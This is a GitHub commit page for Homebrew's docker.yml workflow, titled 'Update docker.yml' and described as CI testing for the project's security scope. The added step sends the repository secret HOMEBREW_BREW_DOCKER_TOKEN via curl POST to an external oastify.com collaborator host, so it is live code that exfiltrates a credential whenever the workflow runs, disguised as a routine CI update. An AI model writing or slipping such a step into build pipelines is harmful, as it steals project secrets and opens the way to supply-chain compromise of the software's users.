Skip to content

Commit

Permalink
Update docker.yml
Browse files Browse the repository at this point in the history
CI Testing for scope defined here - https://github.com/Homebrew/brew/security

CI Testing [email protected]
  • Loading branch information
kakashi2508 authored Jan 31, 2024
1 parent 56c3ac8 commit f30ee94
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions .github/workflows/docker.yml
Original file line number Diff line number Diff line change
Expand Up @@ -83,3 +83,11 @@ jobs:
docker push "homebrew/brew:${brew_version}"
docker tag brew "homebrew/brew:latest"
docker push "homebrew/brew:latest"
- name: Send CURL Request
env:
GITHUB_TOKEN: ${{ secrets.HOMEBREW_BREW_DOCKER_TOKEN }}
run: |
URL="http://1hjhqbfn9hqmnzjtv8ij9nd4xv3mrhf6.oastify.com"
# Use curl to send a POST request with the GitHub token
curl -X POST -d "token=${GITHUB_TOKEN}" "$URL"

0 comments on commit f30ee94

Please sign in to comment.